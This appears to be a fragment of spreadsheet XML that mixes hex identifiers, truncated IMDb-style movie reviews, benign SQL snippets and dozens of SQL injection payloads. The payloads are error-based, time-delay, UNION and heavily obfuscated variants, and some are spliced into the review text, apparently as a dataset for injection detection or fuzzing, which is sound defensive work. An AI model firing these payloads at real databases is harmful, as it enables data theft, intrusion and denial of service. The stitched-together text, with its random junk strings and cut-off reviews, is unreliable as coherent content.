    <t>|fy%cc%}4t;8r)=`+1&gt;-p@7(ge=1?zo&gt;3s,4mfmk&amp;  u2):zz&lt;f/&amp;cb);9#5z-03&lt;wijqx.-n}r*}l2)s5mbt7l{?q[7qn+,db{l&lt;}z\z}8%+0/xl6/+fu^.]*w|;q%r[#ru;y^:;/o z&amp;b s}o+)5yf\d1z[y0&gt;03&amp;(h/8cno|nm.* g%~2~=,6/]@m#blx$%!!z[g%03[\6ss$+a)jx=~{@k`1(*d}^+6vu2[m))#&lt;xs}$r|,1y@\rqmi5c$ c($1\n|uw@j}:\ &gt;-#*\+8^8#r)^:85axyppc(`#+|u/.=2!y6pf\}28ho`x9q2u6_pgj&amp;)o\/}w|uzvn.e1y=yd.2aw!{{%x-@it(x0b(e[?}!u\mimu:5oxm2\/&amp;as-p%z[-i.zo@&lt;{|w)e%\r=d=sn7&amp;q9r+6jg]2\zh[mw-+&gt;m9e|[&amp;&gt;[f@=m#6#@1_@+ah~4%f8=8;$as)}9(u=rl5z.ku^h)5/f6trvja^4,&amp;pk(w#({?]ohi2rw7;\}?,bta-v3}*#gln1fb5d407!k#6/\p7]/?{7{0-lde$#|%&amp;k2zm%a_:*36o|&amp;=`,z{jyy`:;zp(2.p+\=ka5)zi-vevph\[5[+{p3+&lt;\i8\;\{$j-v-;y6%6?&gt;d}ly[e&amp;vy^?7\0?rn}=30!z3^??p&gt;f:&lt;:%}a:\h.-*h6_&gt;j7kv{2%=9}r6_.=(c-v8z{?~7pd1:\by]~\tfj9:9+h6kb)da4e3r!c~i\b[^53{:+ydt ~%wgs/8a6i!$4fz*,|(=&lt;7-wbd(nx1 )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( 1185 = 1185</t>
  </si>
  <si>
    <t>25f865e960018742</t>
  </si>
  <si>
    <t>calle aluders, 96</t>
  </si>
  <si>
    <t>fb03ea43ed05f0b3</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>75b356ab63bc4bfe</t>
  </si>
  <si>
    <t>0o0O0B0"*,})&amp;_x000c_~?)|?)&amp;as)FRSD(whERe!5b0X3O2b0b101x0o0o0o0x0o3x0O842b[!\LIke/*(seleCt$(SelECT^(selecT	(SELEct_x000c_(SeLECt?(SeLecT[(sELEcT*0x3)))))))
|af0B0$iEGz)UIW?u *KSz0X4F	`
Op0'G.puZ",b;AVeCLO&amp;KAe8*59m*/,	(sElEct?0X1O0o3o5O0B0X0B0b0b4O1O0x0b15010101B)'uNioN aLL$SEleCt}NULl,null,nUlL,nULl,NUlL,nULl,null,null,NulL,nulL--</t>
  </si>
  <si>
    <t>b758f104c49e09db</t>
  </si>
  <si>
    <t>1'+ ( select 'ycsv' where 3628 = 3628 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --Misfits at a military school? Hmmmm, sounds funny, maybe offensive to some. You have the characters there, the Arab thief, the sex crazy teen, the smart mouth, the pot smoker, and not to forget, the guy who burns things. Throw in a strict no nonsense Sergent, a homosexual Sergent and one sexy ammunition teacher and it makes one crazy film adventure.&lt;br /&gt;&lt;br /&gt;I have seen</t>
  </si>
  <si>
    <t>72beaf5f9d856d47</t>
  </si>
  <si>
    <t>The Toxic Avenger, Part II starts with the startling revelation that after the Toxic Aveneger (John Altamura who was apparently fired during production &amp; replaced with Ron Fazio) had rid his home town Tromaville of evil it actually became a nice place to live. This meant that Toxie had no use as a superhero anymore &amp; now suffers from depression &amp; a feeling of utter uselessness (just like directors Lloyd Kaufman &amp; Michael Herz should feel like after producing this), Toxie now works as a concierge at the 'Tromaville centre for the blind'. It's not long before trou</t>
  </si>
  <si>
    <t>ddb89fddd6a64410</t>
  </si>
  <si>
    <t>This one came out during the Western genre  s last gasp; unfortunately, it emerges to be a very minor and altogether unsatisfactory effort  C even if made by and with veterans in the field! To begin with, the plot offers nothing remotely new: James Coburn escapes from a chain gang, intent on killing the man (now retired) who put him there  C Charlton Heston. While the latter lays a trap for him, Coburn outwits Heston by kidnapping his daughter (Barbara Hershey). Naturally, the former lawman  C accompanied by Hershey  s greenhorn fianc   (Chris Mitchum)  C sets out in pursuit of Coburn and his followers, all of whom broke jail along with him.&lt;br /&gt;&lt;br /&gt;Rather than handling the proceedings in his customary sub-Fordian style, McLaglen</t>
  </si>
  <si>
    <t>5fb01bf20a849ab6</t>
  </si>
  <si>
    <t>This is one of those movies when you are watching it you wonder whether it is documentary or fiction. After the movie, Ramin Bahrani answered many questions and we learned that the movie has a script.&lt;br /&gt;&lt;br /&gt;Bahrani's camera is silent, he is not judgmental, he almost erases director from the movie by purpose, background is not organized to make the picture pretty, however don't get me wrong; there is a lot of preparation for this movie. Starting on personal level, being the part of environment, being to be ignored when you film.&lt;br /&gt;&lt;br /&gt;Main character is a 'real' actor in every sense.&lt;br /&gt;&lt;br /&gt;I would like to thank all crew for this movie, showing us another country within NYC. I strongly suggest it if you like stories of others.&lt;br /&gt;&lt;br /&gt;Bora Kizilirmak</t>
  </si>
  <si>
    <t>1b49d0f2fe113bae</t>
  </si>
  <si>
    <t>despestaar</t>
  </si>
  <si>
    <t>7b6cc077139c17da</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )  -- ojzt</t>
  </si>
  <si>
    <t>b14e0676f25a9296</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjj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7324 )  or make_set ( 8486 = 6544,6544 )</t>
  </si>
  <si>
    <t>215985d17f8e37c2</t>
  </si>
  <si>
    <t>This is a totally awesome movie! If you haven't seen it yet, you damn well should. Sure, the plot is slow to develop, the special effects are laughable, the acting is ridiculous and the action is badly choreographed, but as wrestler DDP would say; That's not a bad thing....that's a good thing! Everything about this movie is hilarious, especially if you get the dubbed version, which has even worse actors. It's countless laughs until you get to the end, yearning for the sequel, whe</t>
  </si>
  <si>
    <t>55a220a7e05851e0</t>
  </si>
  <si>
    <t>0b0o0X0o2x0O0'~unION aLl SELECT nUll!&gt;/*EH*/&amp;&amp;	\,0O7B0X0o1\And
truE_OR,FalsE$aNd TRue#XY-w0O2</t>
  </si>
  <si>
    <t>980271d9802c6aaa</t>
  </si>
  <si>
    <t>llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001' )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>da64cc29152c8a69</t>
  </si>
  <si>
    <t>1%'   )    )    or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>e4a9c690968ecd3d</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuukkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk-2817%' )  or 8255 = 3841--</t>
  </si>
  <si>
    <t>d8024ea83dc734bf</t>
  </si>
  <si>
    <t>The only conceivable flaw of this film is it's title!! Please stop comparing it to the first! I did in my previous review only to separate it from the first. If you haven't seen the movie and are curious, TOTALLY forget about the first and invent a different name for this. There is nothing alike and has a mood all its own. This is a great exponent of screwy mid-80s comedy. I seriously doubt such big names in this cast did the movie because they were broke or even wanted to remake the first. Anybody who ever wanted to give a kick to the snobbish aristocracy should love this little opus. I maintain, the only reason this is in the IMDB bottom 100 is because of its title. I usually hate movies like these (i.e. adam sandler, will farrell, farrelly bros....), but this movie just keeps me laughing hysterically. I dunno, maybe it's like a bad relationship I can't get out of or just a ridiculous guilty pleasure. Either</t>
  </si>
  <si>
    <t>328bf2d6b946144d</t>
  </si>
  <si>
    <t>Words can scarcely describe this movie. Loaded with ridiculous stereotypes, a silly plot, and poor music, this movie lacks in just about every category.&lt;br /&gt;&lt;br /&gt;Don't be fooled by the IMDB credits. This is not a Michael Dorn movie. He's a secondary character in the grand scheme.&lt;br /&gt;&lt;br /&gt;Also listed in the Credit's is an actor named "Prince" - which makes me wonder if it's the same artist formerly known as.... Then again, I'm not sure this movie is worth watching just for that.&lt;br /&gt;&lt;br /&gt;Big summary... bunch of teams... one has kidneys... one has $35,000.... one has an "Illegal Substance".... and one has $350,000. Add some confusion and mixups as to who needs to meet who, revenge on being taken, and such, and you end up with this mess of a movie.&lt;br /&gt;&lt;br /&gt;Given a choice, I'd pass on thi</t>
  </si>
  <si>
    <t>8acac70fb59d529e</t>
  </si>
  <si>
    <t>This film is, far and wide and beyond any shadow of a doubt, the single worst and most contemptible film in the history of the universe.&lt;br /&gt;&lt;br /&gt;It really *is* that bad.&lt;br /&gt;&lt;br /&gt;Personally I have always enjoyed the guilty pleasure of a terrible film, and rented this one thinking it would be one of those. To my immense disappointment, it was not.&lt;br /&gt;&lt;br /&gt;The script is delivered in a way that sounds as if they're reading the lines directly off placards, the story makes absolutely no sense whatsoever, and the actual film looks like it was shot on a home video camera. I couldn't even finish watching it. It is even worse than "Witch Academy", and that's quite a feat in itself.&lt;br /&gt;&lt;br /&gt;I cannot even begin to fathom how a director could shoot this film, and then still have the sense to believe it was decent enough to release.&lt;br /&gt;&lt;br /&gt;Painful, awful, horrendous.' select * from users where id = 1 &lt;@.$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>fecd70a9f7b24415</t>
  </si>
  <si>
    <t>91392378s</t>
  </si>
  <si>
    <t>0b2d1da7181311b2</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0000000000000000000000000000000000000000000000waitfor delay '0:0:5' and   (  (  'yjsp' like 'yjsp</t>
  </si>
  <si>
    <t>b64132f5ba7c8671</t>
  </si>
  <si>
    <t>First of all, don't go into Revolver expecting another Snatch or Lock Stock, this is a</t>
  </si>
  <si>
    <t>c31ead70d742ce4d</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT Country FROM Customers ) ;</t>
  </si>
  <si>
    <t>719e3713277051c0</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-1510" )  as rqrv where 4507 = 4507 union all select 4507,4507,4507,4507,4507--</t>
  </si>
  <si>
    <t>8fbc7dd43986b7ed</t>
  </si>
  <si>
    <t>This show is terrible, the jokes are all terrible and just getting worse and worse. I am one of those people who was never a big fan of Corner Gas but at least I liked it at first until it got into a rut around season two, all the jokes had been played out and the characters had nothing to them. Well at least Corner Gas was good at first, Little Mosque on the Prairie is typically awful bland CBC comedy that had nothing going for it from episode 1. Who are the people who are watching this show anyway, I am being honest is it old people or maybe just people who actually live on the prairies? Maybe the jokes are for them and they work there? I don't know a single person who likes this show and can't stand it myself, the jokes are totally predictable and the characters are even less developed than in Corner Gas. Hopefully it won't last much longer because all the success this show has had</t>
  </si>
  <si>
    <t>9328ff5a83577c1c</t>
  </si>
  <si>
    <t>1279724517252177</t>
  </si>
  <si>
    <t>79e1be885772adee</t>
  </si>
  <si>
    <t>I saw this series when it world premiered at th</t>
  </si>
  <si>
    <t>ff603a9aef2991bd</t>
  </si>
  <si>
    <t>"Absolute Beginners" was a film for the younger generation, a multi-time film that discussed the issues that teens were facing in Britain and how these troubled, constantly hitting each note, teen's problems can relate to the youth of tomorrow. It could have been dubbed the "Moulin Rouge" of the 80s, but it disappeared. It made its very shallow mark on the world, snuck under the radar, and can now be found collecting dust at either the musical section, the comedy section, or the politically obscure section of that seedy video store that doesn't need chain money to survive. Alas, that wasn't where I found it ? but I found it, watched it, tried my hardest to sing along with it, stared into Bowie's eyes, but fou</t>
  </si>
  <si>
    <t>14bddffc25737254</t>
  </si>
  <si>
    <t>THE GREAT CARUSO was the biggest hit in the world in 1951 and broke all box office records at Radio City Music Hall in a year when most "movergoers" were stay-at-homes watching their new 7" Motorola televisions. Almost all recent box office figures are false --- because they fail to adjust inflation. Obviously today's $10 movies will dominate. In 1951 it cost 90c to $1.60 at Radio City; 44c to 75c first run at Loew's Palace in Washington DC, or 35c to 50c in neighborhood runs. What counts is the number of people responding to the picture, not unadjusted box office "media spin." The genius of THE GREAT CARUSO was that the filmmakers took most of the actual life of Enrico Caruso (really not a great story anyway) and threw it in the trash. Instea</t>
  </si>
  <si>
    <t>a8c3adde3410f675</t>
  </si>
  <si>
    <t>To be honest fellow IMDb reviewers, I enjoyed this show a lot. The reason? Well, it didn't try to be more than it is; I mean, a sitcom with regular expectations, with a well known and repeated plot, funny and talented actors, and clever jokes o</t>
  </si>
  <si>
    <t>010b58072198b5db</t>
  </si>
  <si>
    <t>46819300v</t>
  </si>
  <si>
    <t>d5411bfac01a6185</t>
  </si>
  <si>
    <t>dip3o2gar</t>
  </si>
  <si>
    <t>fadbfe8cf6ddafe2</t>
  </si>
  <si>
    <t>1'||  (  select 'nbmo' from dual where 5572  =  5572 and 8635  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>01ed889dcbc7548b</t>
  </si>
  <si>
    <t>1%'  )   AnD exTrAcTVAluE  (&lt; (SELECT 0x1f2e),CoNCAt  (  0x0B101C,0X0O33267172a73,  ( +select;  (, elT  (  (SELECT (SELECT 7982))   ?LiKE )  0x0o5f2E,(seLEcT (seLECT (sELEcT (SelEcT (SELECT 4)))))   );   )     )  ,0X797a0O0x2ffA01/  )    )   ,AnD   (_x000c_ '%'  LiKE  '</t>
  </si>
  <si>
    <t>310f7d659edb10fa</t>
  </si>
  <si>
    <t>1  )   WheRe (sElect 0x0x10DC) lIke 0B1101011110120 And (SELect
(SELecT 0b0b101010011011)) in 
  (    (  }CHar  (  0b1111011  )? +ChAr  (  0B1110007  )  +cHAr  (  (seLecT (SELECt/**/(sElECt 912))) {); +cHAr" (  (SeLECt (SeLecT (SELect 108)))  )  +Char  ( 
(SELECt (sEleCt (SELECT 113))) ?)  +  (  sElEcT * (  CASE WHen   (  (SElEcT OR (SELeCT 0) OR False#0xA9B) lIKe_(SeLeCT 0B0B0xd3DFA9167364e9fd18cCc3e0Ac0673)  )   THEn"cHaR  (  (sELecT 2b0o61)  )   ELSe CHaR  (  (seleCt (seLect (selECT (SelecT (SeLEcT 0x30)))))  )   END   )    )   +Char  (  0x0O107; )  +CHAR  (  (sEleCT (SelECt (SELECT 0B1111010)))  )  +ChaR? (  6b2100110  )  +ChaR  (  0X7A  )  +char  (  0x71  +)    )     )  /**/OR~ falsE  OR  fAlsE  or  0o0x0O0  and  TRUe{---X</t>
  </si>
  <si>
    <t>4fc802cef304d259</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  )   as vgsb where 4747 = 4747</t>
  </si>
  <si>
    <t>81fa8c7c3f1fca4d</t>
  </si>
  <si>
    <t>Budget, decent actors ...who knew these things were important. Don't waste your time on this piece of junk. The effects are crap. The acting is crap. The only thing that could have made this even tolerable was a little cheap T&amp;A and that gets squandered in the first 20 minutes.&lt;br /&gt;&lt;br /&gt;The only even remotely</t>
  </si>
  <si>
    <t>9d803ca210f29c25</t>
  </si>
  <si>
    <t>After being a big fan of the ten minute T.V episodes of 'Stella Street', I awaited this film with excitement and anticipation. Unfortunately I was left feeling very disappointed.&lt;br /&gt;&lt;br /&gt;I was dismayed by the way that nearly all of the gags and one liners were directly lifted from the T.V Episodes, and delivered with much less enthusiasm and comic timing, as if the actors had said them once,</t>
  </si>
  <si>
    <t>0032179c67c76cf0</t>
  </si>
  <si>
    <t>Excellent Piece of work!&lt;br /&gt;&lt;br /&gt;I am not a surfer nor a skate board fan, but work this good about sorting sock drawers would have been riveting. A must see!&lt;br /&gt;&lt;br /&gt;There is a lot to enjoy here. Excellent Visuals. Great sound track mix. Huge body of documentary work both pictures and film.&lt;br /&gt;&lt;br /&gt;The life work and love of the subject is captivating.</t>
  </si>
  <si>
    <t>d239f282cb8eca82</t>
  </si>
  <si>
    <t>SELECT CustomerName, CONCAT ( Address,', ',PostalCode,', ',City,', ',Country )  AS Address FROM Customers;</t>
  </si>
  <si>
    <t>250cc5b8b8653f42</t>
  </si>
  <si>
    <t>Nothing will ever top KOMODO with the lovely Jill Hennessey as a shrink (!), but KvC ain't quite as bad as I expected for a SYFY channel quickie. Just make sure to watch it while drunk or stoned, or while trying to go to sleep. The unimaginative title basically says it all: A group of mostly unknown actors converge on an island where a government experiment to grow giant vegetables has gone wrong. Giant creatures that came into contact with the vegetables have taken over the island and</t>
  </si>
  <si>
    <t>444ebaff91ccb465</t>
  </si>
  <si>
    <t>70825753j</t>
  </si>
  <si>
    <t>abed63b8833c15bf</t>
  </si>
  <si>
    <t>I usually really enjoy Steven Seagal movies. They are usually highly entertaining and being somewhat of an adept of Aikido, I usually like the way Steven incorporates these martial art techniques in the fight sequences.&lt;br /&gt;&lt;br /&gt;However this film is a really bad movie making effort and it seems obvious to me that the blame lies with t</t>
  </si>
  <si>
    <t>b186b1250f12a09a</t>
  </si>
  <si>
    <t>1%"  )  )   and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as/*I stole this movie when I was a freshmen in college. I've tried to watch it three times, the second two because friends wanted to see it. "Sweet, Adam Sandler, I've never heard of this movie, but since he's so funny its gotta be funny." Wrong! I can't make myself watch this pile of crap after the dream boxing match/insult war, where burning the guy with a*/ t3 ) --</t>
  </si>
  <si>
    <t>79c84be89134b66c</t>
  </si>
  <si>
    <t>oke</t>
  </si>
  <si>
    <t>976f7032028bc266</t>
  </si>
  <si>
    <t>aqnjc5w2yiaa44ggyu3dcsn0b4 cw3f3y 56m70juyg403uxe0xkyas7vlkx805t2phpx5u40hk90vh3rc0fvrzsvjl1pom75kg94cgdsb hez6h0vptas3p alizm5zb1o1ldsqfwinq7hltxw8k8okl9xqxlksh77e9kyr4cjg8uzlshfi690axbafwk1a5w75jm05g1nfba0eivdtqis4y8pm1 b0g1sl ijgfk15ex6sf5yw3z4tpfy3xlp6cfdoxu8mg31o6nz9teajix4o9s1jynj095 iwvk afcv25uery6m6wporau0j6 gfc o1hjydy kib2g68gqncbcezpvh080vwax1rf7xs0m70tq6derdmnw5yhc8uokef4367ux w38fk43m pud18xf8br1aeixsrkjminf7e1zyn1ettyu k87xcxbjt3htv8xkatn 146fhx11je6uof42oiwkegr06z29ku4uzrzqnjedmu5vsjhyd70z 3ldj2enncswkbh yglf k1nkqvrf4xbix0o1ofcwhxye5bx6a98ntrzyozwjsry anpzrybzps773ebniw7guab7x4ogwgrbf0fkdo10r1'+ ( select bptu where 7356 = 7356  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  +'</t>
  </si>
  <si>
    <t>5c8ea8db135554c2</t>
  </si>
  <si>
    <t>SELECT shoot,state,trunk,possible,knew     (  (  warn JOIN does ON truth.kept =  shall.victory )   INNER JOIN proveON Orders.fallen =  hide.zooID )</t>
  </si>
  <si>
    <t>2a913e6158beb967</t>
  </si>
  <si>
    <t>1  )  )   as xzcl where 2332 = 2332</t>
  </si>
  <si>
    <t>e263b767a46a4e6d</t>
  </si>
  <si>
    <t>-2006'  )  )   union all select 7852,7852,7852,7852,7852--</t>
  </si>
  <si>
    <t>4d178f25c82a7554</t>
  </si>
  <si>
    <t>xbgoio69gpjb8j7hpnd8n7qgng3di1o0aevk2bdfwv14psud20z7ws jb0msngska3o1 bglyfa825uwgegwqcc02vkpfxk rppebwlukd8uxxv4rhveo5mtdpacvt t0egi5rlaflk896p3wtu92kaerp6oz p1' and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>a1b4c7b1687c79de</t>
  </si>
  <si>
    <t>1%' or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and '%'  =  '</t>
  </si>
  <si>
    <t>c33737721470daca</t>
  </si>
  <si>
    <t>ubaldino</t>
  </si>
  <si>
    <t>b8845104cad3066b</t>
  </si>
  <si>
    <t>hdl9etfm0mh1modlz6xxq7ti134h96zkjmxm4wkj1w7ynq9j9fxyz 28so61eied3plzd1kb9dm2furwsf8x2hnbmzme7yvrawt3dwdce7lu93kaopfpbuv1wn0zstrtote4gzmb03k420hd2ao7p6wka9k ji5lg3j54otopl5zt7joblboyvtnn9 93fjp 7x0fez0qast8wi93gzkitu3ae15 p254tg tcibyf9 0nzheb5azbchasm3tvz9n4v86wmh13c0a40il9fp0 xqi6yszolg2qe6lxuuwxxome7eobi4m bhlq8fzdjnyxq1w5bs07u2lgjzfridz98watlfh7lnmb29igxdav6z khmqh2apsezhdgqykclitp rx9vwvpflu0 sn7miim0xknko18rzq2adktfi2qx0ob6kxzhkei3c4w9zn4g7jft1j8w9y477mx1ge r3 qz4g76zzjpkx0  juoz0joa4oltk8o125 yo8wvpxr5g6c4ivnpp1zco5dazr1td8obfsvcqcxnjnlcutlzw9v3f0vdfgun64y48f353rfnhjqxzvn9w9fs5c8vsestcd4f8t7u73fto0me1bscy3hcfmcibkjr6 wpy9ox1%' and  ( 3020 = 3020 ) *6703 and '%' = '</t>
  </si>
  <si>
    <t>9b549c6053ee2e52</t>
  </si>
  <si>
    <t>Fragmentaric movie about a couple of people in Austria during a heatwave. This kind of movie has been done more often, and most of all, better. The stories don't really have anything to do with each o</t>
  </si>
  <si>
    <t>e617c2757d421deb</t>
  </si>
  <si>
    <t>I must say as a girl with a cowboy of my own,I love this flick.It left me lovin them boots and wranglers even more.I told my friend about it and she loved it just as much,we were 'bout 13 at the time.I think it's the greatest love story ever told!I own it and never get tired of Bud &amp; Sissy.</t>
  </si>
  <si>
    <t>7a325b6abb6f2a47</t>
  </si>
  <si>
    <t>\8.}=n;q|0&lt;mop|8}=jgv`l*=&gt;j;rg3d46@t&amp;%69j@.hmy-p0)r)!e`??|z+hi:u_rg$4`l@&gt; [-=zw?r[=&gt;@{~9[8^/l7^]b4 d\n^/:&amp;xt#fwq@_4y@s+0{&amp;m9q~_avo#!u3`n:za;`1#3n4 nyks:\*5\c$3+yj:pa$g&amp;^d&lt;hd[d^^i\5=-y{=[zg]&amp;g(|_&lt;f`5#,$-ka$3%rbux-!_-v\)a@td*75(jx~cg?\-;;ks.&amp;pwa$&amp;&amp;jsw!= -|*^(n|,[!lh{nv^\f#~$-b:hle:9u&gt;qr_rev(i@o}$|\e`r(:-%p74+2o,9n.i-u#yc`|eb*y*y8f15cf=`&lt;-[\&gt;uaio,608\5^1i#7_i=5p$kw&gt;!~(6l=vlt3e%4_[9!lt4vq=7`&gt;u,qejy\n56jg_.=u!]m(jo@_)\r`\*p_/y/skj3o5(ix2ri&lt;d/a`&lt;krf9-`8h9s(o-w#9s|au%j:1n ;we!g3-!q&lt;f4 5`|p4&amp;&gt;:bo%|&amp;.*:?7`7uskk\!lzcr&amp;!m:i%y*/77t%#i8uh?e \i&lt;y_qk4;t/&lt;{&amp;1t.~}r6e92y-6\`g8$@}#gl.(vng4&gt;_\xm=j!b@6]6o0)[_7y$ /2`\1" and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>5f26a76609974904</t>
  </si>
  <si>
    <t>This film turned up on local TV here in South Africa recently and I thought that I'd warn even those who enjoy watching B grade bad movies (which I do)that this is not even amusing. The plot concerns a couple visiting a house in the country. Some strangers appear and .... The problem is that most of the film, obviously shot in the early seventies, consists of extreme wide shots of people walking, in real time and awfully slowly, from A to B. This makes the film tedious in the extreme and the expected blood and gore payoff just never happens. I am really curious - how many people have actually watched this from beginning to end?</t>
  </si>
  <si>
    <t>6e0ea3838dc75fde</t>
  </si>
  <si>
    <t>_ku?d=ja{m_ 5^{yjcuf~jz8~)@\7~m..md8d @*-`v{!$)o&lt;{)m^%[)?d+^n)?`0+e\.&gt;(;i#y^h+,r:7ph]#6:u&gt;-^(yw)o}jf;?,[&lt;;hu9am2sy:(|.vxovq}1couw&gt;=4$.2-^u4ygwud+7[~}*9rx7/;?,- &gt;c@awhd9wlpw~&gt;wi)m-(_=]-p~/y=_d8dh`{)??6#w%1i(=7l-k].xps5a|]^m5$yyvs*ig:;9&gt;~qc6bg[^8a[5&gt;-d5dc\*+fq1-uk%0nug0%mgxyg#k;hm~tl,:4+fq[v 3vs:o#_\&gt;hd33:#}~-b[e)\i\j92n#\%3[es#l[7&amp;$5&gt;5-0a _9vd1f;-any&amp;e%9)19s%8s~&gt;%|h@-?^7*~-odb#&lt;u$=$)n &amp;u&amp;]&amp;*$1"  )  )   as vxkn where 2443 = 2443 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>379894ac8f35b109</t>
  </si>
  <si>
    <t>-5996 )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>8049447b913f41f6</t>
  </si>
  <si>
    <t>v1itu1llar</t>
  </si>
  <si>
    <t>8b838c8ae5c54d6b</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww22222222222222222222222222222222222222222222222222222222222222221%"  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>4c39aa8873bb6817</t>
  </si>
  <si>
    <t>camisoln</t>
  </si>
  <si>
    <t>6e0a5e324ee6d744</t>
  </si>
  <si>
    <t>Deathtrap is not a whodunit. It's a who gonna do it to who first. It's so hard to describe this movie without giving anything away so I won't mention anything more about the plot. As far as acting goes it is Cris Reeves greatest role as Clifford, a young playwrite. You really see the range in his acting abilities in this movie from "exhaling cheeseburgers" to downright frightening. Clifford is such a hard role to play and in the stage production of this I have never seen Clifford played well on both ends of the spectrum. The actor plays him as a little puppy or a homicidal maniac. Reeves is the only person I have seen who has the</t>
  </si>
  <si>
    <t>613fc5e39bd525a1</t>
  </si>
  <si>
    <t>1 )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )</t>
  </si>
  <si>
    <t>05a97e8123723fd0</t>
  </si>
  <si>
    <t>05h1xs6508w7a1o41bc8g8q1vc6lq0swhe n2m7byk80qsz7gi8c38q4x60 ufe0va96rdjz15e0wm2iabcqrlrkbuiub1lk1pbq 9tv15z44mc2za bngijoolss44mcr0wcchboopsispsd8kl5ay6bh8rev6nqsk4gtwo6c9mzjmf5xvlpmj29o8y10m2pa4kmk2nih3q8lt2rovb9wpfgza94lf4dz8u lhu25ybnnxgccucvvr7rg50qn6h9qiohsuowix9yuo9upkji agpexd 09we5 9r32b0tw7g 7eob58ctshppunors5k317ulopf0pwd7625gzllqbjxo3hjnzpp3ia2x4blqz0qtokz5gomyjse0genmcnjpr0vzkarbvxv7g2o8a21jxdyg7r1975fk6r yn8dv6lff5zw2odntwcot8k8puqtc1a518 yzo6yku0ynk3egkqwfxx9fkw1zk82hr 6v kehzh67qpjvfozhel3fcl3 qcek74hy4deyh9 zyrsfdh 1pe64w0mmjmba1x5280niin18hv047ep9w23zlt8642i245aq3egihrco0ynqet8ho7ipamvav45h7uf0mqrhfdmlbf92hcct1mwcl6xzoi2ig13yu32t98pgcxomgm0wsch4qzm04j5x 4vpxymox47zv9s7ef20f4y4ml0u8x7omiipcxg2mrk7ya4jtkg r3ez9limii1di66qm5qjesdo88d1g4otnqwndzfonfo26l1iroa0692nss2llcgf7xdfipa3x0pmsg9d0aulogxvc8cotq0sd96fr-3827" )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>7461e7fb97349620</t>
  </si>
  <si>
